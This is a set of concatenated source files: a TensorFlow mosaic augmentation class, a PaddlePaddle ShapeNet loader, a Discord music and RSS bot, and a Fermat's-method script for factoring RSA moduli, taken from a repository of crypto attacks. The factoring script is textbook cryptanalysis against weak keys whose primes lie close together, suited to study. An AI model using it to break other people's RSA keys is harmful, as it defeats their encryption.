self._output_size[1] * (1 - min_offset),
seed=self._seed)
cut_y = preprocessing_ops.random_uniform_strong(
self._output_size[0] * min_offset,
self._output_size[0] * (1 - min_offset),
seed=self._seed)
cut = [cut_y, cut_x]
ishape = tf.convert_to_tensor(
[self._output_size[0], self._output_size[1], 3])
else:
cut = None
ishape = tf.convert_to_tensor(
[self._output_size[0] * 2, self._output_size[1] * 2, 3])
return cut, ishape
def scale_boxes(self, patch, ishape, boxes, classes, xs, ys):
"""Scale and translate the boxes for each image prior to patching."""
xs = tf.cast(xs, boxes.dtype)
ys = tf.cast(ys, boxes.dtype)
pshape = tf.cast(tf.shape(patch), boxes.dtype)
ishape = tf.cast(ishape, boxes.dtype)
translate = tf.cast((ishape - pshape), boxes.dtype)
boxes = box_ops.denormalize_boxes(boxes, pshape[:2])
boxes = boxes + tf.cast([
translate[0] * ys, translate[1] * xs, translate[0] * ys,
translate[1] * xs
], boxes.dtype)
boxes = box_ops.normalize_boxes(boxes, ishape[:2])
return boxes, classes
def _select_ind(self, inds, *args):
items = []
for item in args:
items.append(tf.gather(item, inds))
return items
def _augment_image(self,
image,
boxes,
classes,
is_crowd,
area,
xs=0.0,
ys=0.0,
cut=None):
"""Process a single image prior to the application of patching."""
if self._random_flip:
# Randomly flip the image horizontally.
image, boxes, _ = preprocess_ops.random_horizontal_flip(
image, boxes, seed=self._seed)
# Augment the image without resizing
image, infos, crop_points = preprocessing_ops.resize_and_jitter_image(
image, [self._output_size[0], self._output_size[1]],
random_pad=False,
letter_box=self._letter_box,
jitter=self._random_crop,
shiftx=xs,
shifty=ys,
cut=cut,
seed=self._seed)
# Clip and clean boxes.
boxes, inds = preprocessing_ops.transform_and_clip_boxes(
boxes,
infos,
area_thresh=self._area_thresh,
shuffle_boxes=False,
augment=True,
seed=self._seed)
classes, is_crowd, area = self._select_ind(inds, classes, is_crowd, area) # pylint:disable=unbalanced-tuple-unpacking
return image, boxes, classes, is_crowd, area, crop_points
def _mosaic_crop_image(self, image, boxes, classes, is_crowd, area):
"""Process a patched image in preperation for final output."""
if self._mosaic_crop_mode != 'crop':
shape = tf.cast(preprocessing_ops.get_image_shape(image), tf.float32)
center = shape * self._mosaic_center
# shift the center of the image by applying a translation to the whole
# image
ch = tf.math.round(
preprocessing_ops.random_uniform_strong(
-center[0], center[0], seed=self._seed))
cw = tf.math.round(
preprocessing_ops.random_uniform_strong(
-center[1], center[1], seed=self._seed))
# clip the boxes to those with in the image
image = tfa.image.translate(image, [cw, ch], fill_value=self._pad_value)
boxes = box_ops.denormalize_boxes(boxes, shape[:2])
boxes = boxes + tf.cast([ch, cw, ch, cw], boxes.dtype)
boxes = box_ops.clip_boxes(boxes, shape[:2])
inds = box_ops.get_non_empty_box_indices(boxes)
boxes = box_ops.normalize_boxes(boxes, shape[:2])
boxes, classes, is_crowd, area = self._select_ind(inds, boxes, classes, # pylint:disable=unbalanced-tuple-unpacking
is_crowd, area)
# warp and scale the fully stitched sample
image, _, affine = preprocessing_ops.affine_warp_image(
image, [self._output_size[0], self._output_size[1]],
scale_min=self._aug_scale_min,
scale_max=self._aug_scale_max,
translate=self._aug_rand_translate,
degrees=self._aug_rand_angle,
perspective=self._aug_rand_perspective,
random_pad=self._random_pad,
seed=self._seed)
height, width = self._output_size[0], self._output_size[1]
image = tf.image.resize(image, (height, width))
# clip and clean boxes
boxes, inds = preprocessing_ops.transform_and_clip_boxes(
boxes,
None,
affine=affine,
area_thresh=self._area_thresh,
seed=self._seed)
classes, is_crowd, area = self._select_ind(inds, classes, is_crowd, area) # pylint:disable=unbalanced-tuple-unpacking
return image, boxes, classes, is_crowd, area, area
# mosaic full frequency doubles model speed
def _process_image(self, sample, shiftx, shifty, cut, ishape):
"""Process and augment each image."""
(image, boxes, classes, is_crowd, area, crop_points) = self._augment_image(
sample['image'], sample['groundtruth_boxes'],
sample['groundtruth_classes'], sample['groundtruth_is_crowd'],
sample['groundtruth_area'], shiftx, shifty, cut)
(boxes, classes) = self.scale_boxes(image, ishape, boxes, classes,
1 - shiftx, 1 - shifty)
sample['image'] = image
sample['groundtruth_boxes'] = boxes
sample['groundtruth_classes'] = classes
sample['groundtruth_is_crowd'] = is_crowd
sample['groundtruth_area'] = area
sample['shiftx'] = shiftx
sample['shifty'] = shifty
sample['crop_points'] = crop_points
return sample
def _patch2(self, one, two):
"""Stitch together 2 images in totality."""
sample = one
sample['image'] = tf.concat([one['image'], two['image']], axis=-2)
sample['groundtruth_boxes'] = tf.concat(
[one['groundtruth_boxes'], two['groundtruth_boxes']], axis=0)
sample['groundtruth_classes'] = tf.concat(
[one['groundtruth_classes'], two['groundtruth_classes']], axis=0)
sample['groundtruth_is_crowd'] = tf.concat(
[one['groundtruth_is_crowd'], two['groundtruth_is_crowd']], axis=0)
sample['groundtruth_area'] = tf.concat(
[one['groundtruth_area'], two['groundtruth_area']], axis=0)
return sample
def _patch(self, one, two):
"""Build the full 4 patch of images from sets of 2 images."""
image = tf.concat([one['image'], two['image']], axis=-3)
boxes = tf.concat([one['groundtruth_boxes'], two['groundtruth_boxes']],
axis=0)
classes = tf.concat(
[one['groundtruth_classes'], two['groundtruth_classes']], axis=0)
is_crowd = tf.concat(
[one['groundtruth_is_crowd'], two['groundtruth_is_crowd']], axis=0)
area = tf.concat([one['groundtruth_area'], two['groundtruth_area']], axis=0)
if self._mosaic_crop_mode is not None:
image, boxes, classes, is_crowd, area, _ = self._mosaic_crop_image(
image, boxes, classes, is_crowd, area)
sample = one
height, width = preprocessing_ops.get_image_shape(image)
sample['image'] = tf.cast(image, tf.uint8)
sample['groundtruth_boxes'] = boxes
sample['groundtruth_area'] = area
sample['groundtruth_classes'] = tf.cast(classes,
sample['groundtruth_classes'].dtype)
sample['groundtruth_is_crowd'] = tf.cast(is_crowd, tf.bool)
sample['width'] = tf.cast(width, sample['width'].dtype)
sample['height'] = tf.cast(height, sample['height'].dtype)
sample['num_detections'] = tf.shape(sample['groundtruth_boxes'])[1]
sample['is_mosaic'] = tf.cast(1.0, tf.bool)
del sample['shiftx']
del sample['shifty']
del sample['crop_points']
return sample
def _mosaic(self, one, two, three, four):
"""Stitch together 4 images to build a mosaic."""
if self._mosaic_frequency >= 1.0:
domo = 1.0
else:
domo = preprocessing_ops.random_uniform_strong(
0.0, 1.0, dtype=tf.float32, seed=self._seed)
noop = one.copy()
if domo >= (1 - self._mosaic_frequency):
cut, ishape = self._generate_cut()
one = self._process_image(one, 1.0, 1.0, cut, ishape)
two = self._process_image(two, 0.0, 1.0, cut, ishape)
three = self._process_image(three, 1.0, 0.0, cut, ishape)
four = self._process_image(four, 0.0, 0.0, cut, ishape)
patch1 = self._patch2(one, two)
patch2 = self._patch2(three, four)
stitched = self._patch(patch1, patch2)
return stitched
else:
return self._add_param(noop)
def _beta(self, alpha, beta):
"""Generates a random number using the beta distribution."""
a = tf.random.gamma([], alpha)
b = tf.random.gamma([], beta)
return b / (a + b)
def _mixup(self, one, two):
"""Blend together 2 images for the mixup data augmentation."""
if self._mixup_frequency >= 1.0:
domo = 1.0
else:
domo = preprocessing_ops.random_uniform_strong(
0.0, 1.0, dtype=tf.float32, seed=self._seed)
noop = one.copy()
if domo >= (1 - self._mixup_frequency):
sample = one
otype = one['image'].dtype
r = self._beta(8.0, 8.0)
sample['image'] = (
r * tf.cast(one['image'], tf.float32) +
(1 - r) * tf.cast(two['image'], tf.float32))
sample['image'] = tf.cast(sample['image'], otype)
sample['groundtruth_boxes'] = tf.concat(
[one['groundtruth_boxes'], two['groundtruth_boxes']], axis=0)
sample['groundtruth_classes'] = tf.concat(
[one['groundtruth_classes'], two['groundtruth_classes']], axis=0)
sample['groundtruth_is_crowd'] = tf.concat(
[one['groundtruth_is_crowd'], two['groundtruth_is_crowd']], axis=0)
sample['groundtruth_area'] = tf.concat(
[one['groundtruth_area'], two['groundtruth_area']], axis=0)
return sample
else:
return self._add_param(noop)
def _add_param(self, sample):
"""Add parameters to handle skipped images."""
sample['is_mosaic'] = tf.cast(0.0, tf.bool)
sample['num_detections'] = tf.shape(sample['groundtruth_boxes'])[0]
return sample
def _apply(self, dataset):
"""Apply mosaic to an input dataset."""
determ = self._deterministic
dataset = dataset.prefetch(tf.data.AUTOTUNE)
one = dataset.shuffle(100, seed=self._seed, reshuffle_each_iteration=True)
two = dataset.shuffle(
100, seed=self._seed + 1, reshuffle_each_iteration=True)
three = dataset.shuffle(
100, seed=self._seed + 2, reshuffle_each_iteration=True)
four = dataset.shuffle(
100, seed=self._seed + 3, reshuffle_each_iteration=True)
dataset = tf.data.Dataset.zip((one, two, three, four))
dataset = dataset.map(
self._mosaic, num_parallel_calls=tf.data.AUTOTUNE, deterministic=determ)
if self._mixup_frequency > 0:
one = dataset.shuffle(
100, seed=self._seed + 4, reshuffle_each_iteration=True)
two = dataset.shuffle(
100, seed=self._seed + 5, reshuffle_each_iteration=True)
dataset = tf.data.Dataset.zip((one, two))
dataset = dataset.map(
self._mixup,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=determ)
return dataset
def _skip(self, dataset):
"""Skip samples in a dataset."""
determ = self._deterministic
return dataset.map(
self._add_param,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=determ)
def mosaic_fn(self, is_training=True):
"""Determine which function to apply based on whether model is training."""
if is_training and self._mosaic_frequency > 0.0:
return self._apply
else:
return self._skip
``` |
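`mosaic_fn` returns a dataset-to-dataset transform (`_apply` when training with mosaic enabled, `_skip` otherwise), so it is meant to be applied to a decoded, unbatched `tf.data.Dataset` of sample dicts. A rough wiring sketch, where `decoded_dataset` is a placeholder for whatever decoder produces the keys used above:
```python
# Sketch only: `decoded_dataset` is assumed to yield dicts with the keys used above
# ('image', 'groundtruth_boxes', 'groundtruth_classes', 'groundtruth_is_crowd',
#  'groundtruth_area', 'width', 'height').
mosaic = Mosaic(output_size=[640, 640],
                mosaic_frequency=1.0,
                mixup_frequency=0.0,
                mosaic_crop_mode='scale',
                random_flip=True,
                seed=42)

mosaic_transform = mosaic.mosaic_fn(is_training=True)
train_dataset = mosaic_transform(decoded_dataset)  # stitches groups of 4 samples
```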
{
"source": "63445538/Contrib",
"score": 2
} |
#### File: Contrib/pf-net/shapenet_part_loader.py
```python
import paddle.fluid as fluid
import os
import os.path
import json
import numpy as np
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
dataset_path = os.path.abspath(
os.path.join(BASE_DIR, 'dataset/shapenet_part/shapenetcore_partanno_segmentation_benchmark_v0/'))
class PartDataset(object):
def __init__(self, root=dataset_path, num_point=2500, classification=True, class_choice=None, mode='train',
normalize=True):
self.num_point = num_point
self.root = root
self.mode = mode
self.catfile = os.path.join(self.root, 'synsetoffset2category.txt')
self.cat = {}
self.classification = classification
self.normalize = normalize
with open(self.catfile, 'r') as f:
for line in f:
ls = line.strip().split()
self.cat[ls[0]] = ls[1]
# print(self.cat)
        if class_choice is not None:
self.cat = {k: v for k, v in self.cat.items() if k in class_choice}
print(self.cat)
self.meta = {}
with open(os.path.join(self.root, 'train_test_split', 'shuffled_train_file_list.json'), 'r') as f:
train_ids = set([str(d.split('/')[2]) for d in json.load(f)])
with open(os.path.join(self.root, 'train_test_split', 'shuffled_val_file_list.json'), 'r') as f:
val_ids = set([str(d.split('/')[2]) for d in json.load(f)])
with open(os.path.join(self.root, 'train_test_split', 'shuffled_test_file_list.json'), 'r') as f:
test_ids = set([str(d.split('/')[2]) for d in json.load(f)])
for item in self.cat:
# print('category', item)
self.meta[item] = []
dir_point = os.path.join(self.root, self.cat[item], 'points')
dir_seg = os.path.join(self.root, self.cat[item], 'points_label')
# print(dir_point, dir_seg)
fns = sorted(os.listdir(dir_point))
if self.mode == 'trainval':
fns = [fn for fn in fns if ((fn[0:-4] in train_ids) or (fn[0:-4] in val_ids))]
elif self.mode == 'train':
fns = [fn for fn in fns if fn[0:-4] in train_ids]
elif self.mode == 'val':
fns = [fn for fn in fns if fn[0:-4] in val_ids]
elif self.mode == 'test':
fns = [fn for fn in fns if fn[0:-4] in test_ids]
else:
print('Unknown split: %s. Exiting..' % self.mode)
sys.exit(-1)
for fn in fns:
token = (os.path.splitext(os.path.basename(fn))[0])
self.meta[item].append((os.path.join(dir_point, token + '.pts'), os.path.join(dir_seg, token + '.seg'),
self.cat[item], token))
self.datapath = []
for item in self.cat:
for fn in self.meta[item]:
self.datapath.append((item, fn[0], fn[1], fn[2], fn[3]))
self.classes = dict(zip(sorted(self.cat), range(len(self.cat))))
print(self.classes)
self.num_seg_classes = 0
if not self.classification:
for i in range(len(self.datapath) // 50):
l = len(np.unique(np.loadtxt(self.datapath[i][2]).astype(np.uint8)))
if l > self.num_seg_classes:
self.num_seg_classes = l
# print(self.num_seg_classes)
def get_random_sample(self, index):
fn = self.datapath[index]
cls = self.classes[self.datapath[index][0]]
# cls = np.array([cls]).astype(np.int32)
point_set = np.loadtxt(fn[1]).astype(np.float32)
if self.normalize:
point_set = self.pc_normalize(point_set)
seg = np.loadtxt(fn[2]).astype(np.int64) - 1
foldername = fn[3]
filename = fn[4]
# print(point_set.shape, seg.shape)
choice = np.random.choice(len(seg), self.num_point, replace=True)
# resample
point_set = point_set[choice, :]
seg = seg[choice]
# To Pytorch
# point_set = torch.from_numpy(point_set)
# seg = torch.from_numpy(seg)
# cls = torch.from_numpy(np.array([cls]).astype(np.int64))
# To PaddlePaddle
if self.classification:
return point_set, cls
else:
return point_set, seg, cls
def __len__(self):
return len(self.datapath)
def pc_normalize(self, pc):
""" pc: NxC, return NxC """
l = pc.shape[0]
centroid = np.mean(pc, axis=0)
pc = pc - centroid
m = np.max(np.sqrt(np.sum(pc ** 2, axis=1)))
pc = pc / m
return pc
def get_reader(self, batch_size):
batch_num = int(len(self.datapath)/batch_size)
def __reader__():
for _ in range(batch_num):
sample_list = []
for _ in range(batch_size):
choice = np.random.choice(len(self.datapath))
point, label = self.get_random_sample(choice)
sample_list.append([point, label])
yield sample_list
return __reader__
if __name__ == '__main__':
dset = PartDataset(
root='/home/arclab/PF-Net-Point-Fractal-Network/dataset/shapenet_part/shapenetcore_partanno_segmentation_benchmark_v0/',
classification=True, class_choice=None, num_point=2048, mode='train')
    place = fluid.CUDAPlace(0)  # or fluid.CPUPlace()
fluid.enable_imperative(place)
train_loader = fluid.io.DataLoader.from_generator(capacity=10)
train_loader.set_sample_list_generator(dset.get_reader(32), places=place)
for data in train_loader():
points, label = data
batch_size = points.shape[0]
print(label)
# print(ps.size(), ps.type(), cls.size(), cls.type())
# print(ps)
# ps = ps.numpy()
# np.savetxt('ps'+'.txt', ps, fmt = "%f %f %f")
``` |
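`pc_normalize` above centers each point cloud at the origin and scales it so the farthest point sits on the unit sphere. A quick standalone numeric check of that behaviour:
```python
import numpy as np

pc = np.array([[2.0, 0.0, 0.0],
               [4.0, 0.0, 0.0],
               [3.0, 1.0, 0.0]], dtype=np.float32)
centroid = pc.mean(axis=0)                     # [3, 1/3, 0]
pc = pc - centroid
pc = pc / np.max(np.sqrt((pc ** 2).sum(axis=1)))
print(np.max(np.linalg.norm(pc, axis=1)))      # 1.0: farthest point lies on the unit sphere
```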
{
"source": "636F57/CryptoAttackers",
"score": 3
} |
#### File: CryptoAttackers/RSA-Factorization/FermatsFactor.py
```python
from decimal import *
import time
import sys
bFileOutput = True
def fermatsFactorBasic(N):
NN = Decimal(N)
A = NN.sqrt()
A = A.to_integral_value(rounding=ROUND_CEILING)
b2 = A * A - NN
Amax = Decimal(0.5) * NN + 1
try:
tmp = b2.sqrt()
while tmp != tmp.to_integral_value():
A += 1 # search upward to find A such that A = (p+q)/2
if A > Amax:
print("Could not factor N.")
sys.exit()
b2 = A * A - NN
tmp = b2.sqrt()
except KeyboardInterrupt:
print("Interrupted. A=",A)
sys.exit()
p = A + tmp # tmp = abs((p-q)/2)
q = A - tmp
return int(p), int(q)
if __name__ == "__main__":
getcontext().prec = 4096
N = Decimal(input("Enter N as base-10 integer:"))
if N < 0 or N % Decimal(2) == 0:
print("N must be a positive odd integer.")
sys.exit()
t_start = time.time()
p, q = fermatsFactorBasic(N)
t_taken = time.time()-t_start
if bFileOutput:
with open("factor_out.txt", "w") as f:
strOut = "N = " + str(N) + "\n"
f.write(strOut)
print(strOut)
strOut = "p = " + str(p) + "\n"
f.write(strOut)
print(strOut)
strOut = "q = " + str(q) + "\n"
f.write(strOut)
print(strOut)
strOut = "calc time =" + str(t_taken // 60) + " min " + str(t_taken % 60) + " sec" + "\n"
f.write(strOut)
print(strOut)
else:
print( "N =", N)
print( "p =", p)
print( "q =", q)
print( "calc time =", t_taken // 60, " min", t_taken % 60, "sec")
print("done")
``` |
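The loop above is Fermat's factorization: write the odd composite N as A^2 - b^2 = (A + b)(A - b) and search A upward from ceil(sqrt(N)) until A^2 - N is a perfect square. The same idea in plain integers, with a small N chosen for readability:
```python
import math

N = 5959                       # 101 * 59
A = math.isqrt(N)
if A * A < N:
    A += 1                     # start at ceil(sqrt(N))
while True:
    b2 = A * A - N
    b = math.isqrt(b2)
    if b * b == b2:            # A^2 - N is a perfect square
        break
    A += 1
print(A + b, A - b)            # 101 59
```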
{
"source": "636F57/discordbots",
"score": 2
} |
#### File: 636F57/discordbots/cactusbot.py
```python
import discord
from discord.ext import commands
import random
import glob
from os.path import basename
import time
import aiohttp
from bs4 import BeautifulSoup
import asyncio
import html
import calendar
from cactusconsts import CactusConsts
import traceback
if not discord.opus.is_loaded(): #this is necessary for voice activities
discord.opus.load_opus('libopus-0.dll')
print("opus dll is loaded = ", discord.opus.is_loaded())
description = '''Utility Bot custom-made for this server. :cactus:'''
bot = commands.Bot(command_prefix='#', description=description)
#global variants for music
g_listEcho = []
Mee6_ID = CactusConsts.Mee6_ID
fredboadPrefix = ";;play "
marshmallowPrefix = ":request "
#global variants for RSS
g_RSSdictkey = ["index", "url", "lastModified", "eTag", "lastcheck", "channel_ID", "userID"]
filenameRSS = "RSSdata" #RSSdata format: "index","url","lastModified","eTag","lastcheck","channel_ID","userID"\n for each entry
g_session = aiohttp.ClientSession()
g_intervalhours = 2 # RSS check interval in hours
@bot.event
async def on_ready():
print('Logged in as')
print(bot.user.name)
print(bot.user.id)
print('------')
#### For music utility ####
@bot.event
async def on_message(message):
print("on message : ", message.author.name, message.author.id)
global g_listEcho
if (message.author.id == Mee6_ID):
print("message by Mee6")
if len(g_listEcho) > 0:
#print(message.content)
if CactusConsts.Mee6_notfound_msg in message.content:
print("canceling 1 echo")
g_listEcho.pop(0)
elif 'youtu' in message.content:
print("in echo")
await bot.send_message(message.channel, g_listEcho[0] + message.content)
g_listEcho.pop(0)
if (len(g_listEcho) > 0 ) and (g_listEcho[0] == marshmallowPrefix):
await asyncio.sleep(10) # since requests to marshmallow must have 10sec intervals
else:
await bot.process_commands(message)
@bot.command()
async def songfiles():
"""List the available songlist category options."""
strList = ""
fileList = glob.glob("./Songs/*.txt")
if len(fileList) == 0:
strList = "No file found."
else:
for file in fileList:
strList += basename(file) + " "
await bot.say(strList)
@bot.command()
async def feeda(number : int, category='favorite'):
"""Feed number of songs to Aethex, randomly selecting from the txt file."""
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
print("category = ", category)
strFile = "./Songs/" + category + ".txt"
with open(strFile, "rt") as f:
listSongs = f.readlines()
print("list length = ", len(listSongs))
for i in range(number):
strCommand = "-play " + listSongs[random.randint(0, len(listSongs)-1)] + "\n"
await bot.say(strCommand)
@bot.command()
async def feedf(number : int, category='favorite'):
"""Feed number of songs to FredBoat, randomly selecting from the txt file."""
global g_listEcho
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
print("category = ", category)
strFile = "./Songs/" + category + ".txt"
with open(strFile, "rt") as f:
listSongs = f.readlines()
print("list length = ", len(listSongs))
for i in range(number):
strCommand = "!youtube " + listSongs[random.randint(0, len(listSongs)-1)] + "\n"
await bot.say(strCommand)
g_listEcho.append(fredboadPrefix)
@bot.command()
async def feedm(number : int, category='favorite'):
"""Feed number of songs to Marshmallow, randomly selecting from the txt file."""
global g_listEcho
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
print("category = ", category)
strFile = "./Songs/" + category + ".txt"
with open(strFile, "rt") as f:
listSongs = f.readlines()
print("list length = ", len(listSongs))
for i in range(number):
strCommand = "!youtube " + listSongs[random.randint(0, len(listSongs)-1)] + "\n"
await bot.say(strCommand)
g_listEcho.append(marshmallowPrefix)
    time.sleep(11)  # since requests to marshmallow must have 10sec intervals
@bot.command()
async def feedf_url(number : int):
"""Feed number of URLs to FredBoat, randomly selecting from the FavoriteURLs file."""
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
strFile = "./Songs/FavoriteURLs"
with open(strFile, "rt") as f:
listURLs = f.readlines()
print("list length = ", len(listURLs))
for i in range(number):
strCommand = fredboadPrefix + listURLs[random.randint(0, len(listURLs)-1)] + "\n"
await bot.say(strCommand)
@bot.command()
async def feedm_url(number : int):
"""Feed number of URLs to Marshmallow, randomly selecting from the FavoriteURLs file."""
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
strFile = "./Songs/FavoriteURLs"
with open(strFile, "rt") as f:
listURLs = f.readlines()
print("list length = ", len(listURLs))
for i in range(number):
strCommand = marshmallowPrefix + listURLs[random.randint(0, len(listURLs)-1)] + "\n"
await bot.say(strCommand)
    time.sleep(11)  # since requests to marshmallow must have 10sec intervals
@bot.command()
async def feedf_url_playlist():
"""Feed one of playlist url to FredBoat, randomly selecting from the FavoritePlaylists file."""
strFile = "./Songs/FavoritePlaylists"
with open(strFile, "rt") as f:
listURLs = f.readlines()
print("list length = ", len(listURLs))
strCommand = fredboadPrefix + listURLs[random.randint(0, len(listURLs)-1)] + "\n"
await bot.say(strCommand)
@bot.command()
async def feedm_url_playlist():
"""Feed one of playlist url to Marshmallow, randomly selecting from the FavoritePlaylists file."""
strFile = "./Songs/FavoritePlaylists"
with open(strFile, "rt") as f:
listURLs = f.readlines()
print("list length = ", len(listURLs))
strCommand = marshmallowPrefix + listURLs[random.randint(0, len(listURLs)-1)] + "\n"
await bot.say(strCommand)
@bot.command()
async def favor(song):
"""Add the song to Favorite.txt file."""
if song == "":
await bot.say("You must specify the song to add.")
with open("./Songs/Favorite.txt", "a+") as f:
f.write(song + "\n")
await bot.say(song + " is added. :cactus:")
@bot.command()
async def favor_url(url):
"""Add the URL to FavoriteURLs file."""
if url == "":
await bot.say("You must specify the URL to add.")
with open("./Songs/FavoriteURLs", "a+") as f:
f.write(url + "\n")
await bot.say(url + " is added. :cactus:")
@bot.command()
async def favor_url_playlist(url):
"""Add the playlist URL to FavoritePlaylists file."""
if url == "":
await bot.say("You must specify the URL to add.")
with open("./Songs/FavoritePlaylists", "a+") as f:
f.write(url + "\n")
await bot.say(url + " is added. :cactus:")
@bot.command(pass_context=True)
async def join(ctx):
"""Let CactusBot to join the voice channel."""
print(ctx.message.author)
voiceclient = bot.voice_client_in(ctx.message.server)
print(ctx.message.server)
if voiceclient == None:
print(ctx.message.author.voice.voice_channel)
await bot.join_voice_channel(ctx.message.author.voice.voice_channel)
elif voiceclient.channel != ctx.message.channel:
await voiceclient.move_to(ctx.message.channel)
@bot.command()
async def ytm(text):
"""Feed search result to Marshmallow."""
global g_listEcho
await bot.say("!youtube " + text)
g_listEcho.append(marshmallowPrefix)
@bot.command()
async def ytf(text):
"""Feed search result to FredBoat."""
global g_listEcho
await bot.say("!youtube " + text)
g_listEcho.append(fredboadPrefix)
#############################
#### For RSS utility #####
# return the channel ID of the given name in the server
# return "" when not found
def get_channel_ID(bot, server_ID, channel_name):
if channel_name == "":
return ""
for channel in bot.get_server(server_ID).channels:
if channel.name == channel_name:
return channel.id
return ""
def read_rssfile():
global g_RSSdictkey
listRSSdict = []
with open(filenameRSS, "rt") as f:
for line in f:
if len(line) > 1:
line = line.lower()
listRSSdict.append(dict(zip(g_RSSdictkey, line.strip().split(','))))
return listRSSdict
def max_index_of_rssfile():
max_index = 0
listRSSdict = read_rssfile()
if len(listRSSdict) > 0:
max_index = listRSSdict[len(listRSSdict)-1]["index"] #assume the last entry always has the max index
return max_index
def write_rssfile(listRSSdict):
global g_RSSdictkey
with open(filenameRSS, "wt") as f:
for rss in listRSSdict:
line = ""
for key in g_RSSdictkey:
line += str(rss[key]) + ","
f.write(line[:-1]+"\n")
print("successfully wrote listRSSdict to the file.")
return
@bot.command(pass_context=True)
async def rss_add_reddit(ctx):
"""Specify the subreddit name and channel name. Add the subreddit to RSS check-list."""
command,sub,channel_name = ctx.message.content.split(' ')
line = str(int(max_index_of_rssfile())+1)+",https://www.reddit.com/r/"+ sub +"/.rss,,,"+str(int(time.time()))
channelID = get_channel_ID(bot, ctx.message.server.id, channel_name)
print("CACTUS ROOMS SERVER ID:",ctx.message.server.id)
if channelID == "":
channelID = ctx.message.channel.id
line += ","+ channelID + "," + ctx.message.author.id + "\n"
with open(filenameRSS, "a+") as f:
f.write(line)
await bot.say(":cactus:"+sub+" was added to RSS list.:cactus:")
@bot.command(pass_context=True)
async def rss_add_github(ctx):
"""Specify github repo URL and channel name. Add the repo to RSS check-list."""
command,url,channel_name = ctx.message.content.split(' ')
if not 'github' in url:
await bot.say("It is not GitHub URL.")
return
with open(filenameRSS, "a+") as f:
if url[len(url)-1] != '/':
url += '/'
line = str(int(max_index_of_rssfile())+1)+","+url+"commits/master.atom,,,"+str(int(time.time()))
channelID = get_channel_ID(bot, ctx.message.server.id, channel_name)
if channelID == "":
channelID = ctx.message.channel.id
line += ","+ channelID + "," + ctx.message.author.id + "\n"
f.write(line)
await bot.say(":cactus:"+url+" was added to RSS list.:cactus:")
@bot.command(pass_context=True)
async def rss_list(ctx):
"""List all the RSS URLs requested by you."""
bAll = False
# only server owner can see all the URLs in the list
if ctx.message.author.id == ctx.message.server.owner.id:
bAll = True
listRSSdict = read_rssfile()
if len(listRSSdict) == 0:
await bot.say("There is no URL in the list.")
for rss in listRSSdict:
if bAll or ctx.message.author.id == rss["userID"]:
channel_name = bot.get_channel(rss["channel_ID"]).name
await bot.say(rss["index"]+" : " + rss["url"] +" to #" + channel_name) #list index, URL, and channel to cat
@bot.command()
async def rss_del(index):
"""Delete the specified index entry from RSS check-list."""
listRSSdict = read_rssfile()
output = []
for rss in listRSSdict:
if rss["index"] != index:
output.append(rss)
write_rssfile(output)
if len(output) < len(listRSSdict):
await bot.say(index+" was deleted.")
else:
await bot.say(index+" was not found in the list.")
# function that is called as a task to fetch and report RSS updates
async def checkRSS(bot):
global g_RSSdictkey
global g_session
try:
while not bot.is_closed:
print("now in checkRSS.")
while bot.is_logged_in:
print("now start checking RSS updates...")
listRSSdict = read_rssfile()
if len(listRSSdict) == 0:
print("no RSS urls found.")
else:
header = {'User-Agent':CactusConsts.UserAgentName}
for rss in listRSSdict:
rss_backup = rss
try:
print("checking RSS of ", rss["url"])
if len(rss["lastModified"]) > 0:
header['If-Modified-Since'] = rss["lastModified"] #Last-Modified
if len(rss["eTag"]) > 0:
header['If-None-Match'] = rss["eTag"] #ETAG
response = await g_session.get(rss["url"], headers = header)
print("response status=",response.status)
if response.status == 304:
print("no update for ", rss["url"])
elif response.status == 200:
#print(response.headers)
if 'LAST-MODIFIED' in response.headers:
rss["lastModified"] = response.headers['LAST-MODIFIED']
else:
rss["lastModified"] = ""
if 'ETAG' in response.headers:
rss["eTag"] = response.headers['ETAG']
else:
rss["eTag"] = ""
body = await response.read()
soup = BeautifulSoup(body)
entries = soup.find_all('entry')
if 'reddit' in rss["url"]:
await process_reddit(bot, entries, rss["lastcheck"], bot.get_channel(rss["channel_ID"]))
elif 'github' in rss["url"]:
await process_github(bot, entries, rss["lastcheck"], bot.get_channel(rss["channel_ID"]))
else:
await bot.say("Failed to get RSS feed from the server. " + rss["url"])
response.close()
rss["lastcheck"] = int(time.time())
except:
rss = rss_backup
print("error in checkRSS:",rss["url"])
print(traceback.format_exc())
write_rssfile(listRSSdict)
await asyncio.sleep(g_intervalhours*3600)
await asyncio.sleep(30) #wait 30 seconds then retry
except asyncio.CancelledError:
print("checkRSS task is cancelled by program")
except Exception as e:
print("Error in checkRSS:", e.args)
# functions which actrually parse the HTML and make the bot say the results
async def process_reddit(bot, entries, lastcheck, channel):
for entry in entries:
if is_updated(entry.find('updated').text, lastcheck):
postcat = entry.find('category')
#print(postcat)
strSay = ":cactus:*New Post at " + postcat['term'] + ' (' + postcat['label'] + ')*:cactus:\n\n'
strSay += "**Title : " + entry.find('title').text + '**\n'
#print(entry.find('content').text)
postcontent = html.unescape(entry.find('content').text)
#print(postcontent)
postcontent = BeautifulSoup(postcontent)
urlcontent = postcontent.find_all('a')
#print(urlcontent)
for url in urlcontent:
if '[comments]' in url:
strSay += url['href'] + "\n"
break
#print(strSay)
await bot.send_message(channel, strSay)
async def process_github(bot, entries, lastcheck, channel):
for entry in entries:
#print(entry)
if is_updated(entry.find('updated').text, lastcheck) :
author = entry.find('author')
strSay = ":cactus:*New Commit at GitHub by " + author.find('name').text + '*:cactus:\n\n'
strSay += "**Comment : " + entry.find('title').text + '**\n'
strSay += entry.find('link')['href']
print(strSay)
await bot.send_message(channel, strSay)
# updatedtime should be in the format like: 2016-11-11T12:38:34+02:00(reddit) or 2016-11-11T12:38:34Z(github) #changed 8th.dec.2016
# lastcheck is the string which is stored in RSSfile
def is_updated(updatedtime, lastcheck):
print(updatedtime)
shiftsec = 0
if '+' in updatedtime:
times = updatedtime.split('+')
updatedtime = times[0]
        shifttimes = times[1].split(':')  # e.g. '+02:00' -> ['02', '00']
        shiftsec = int(shifttimes[0]) * 3600 + int(shifttimes[1]) * 60
elif 'Z' in updatedtime:
updatedtime = updatedtime[:-1]
sttime = time.strptime(updatedtime, "%Y-%m-%dT%H:%M:%S")
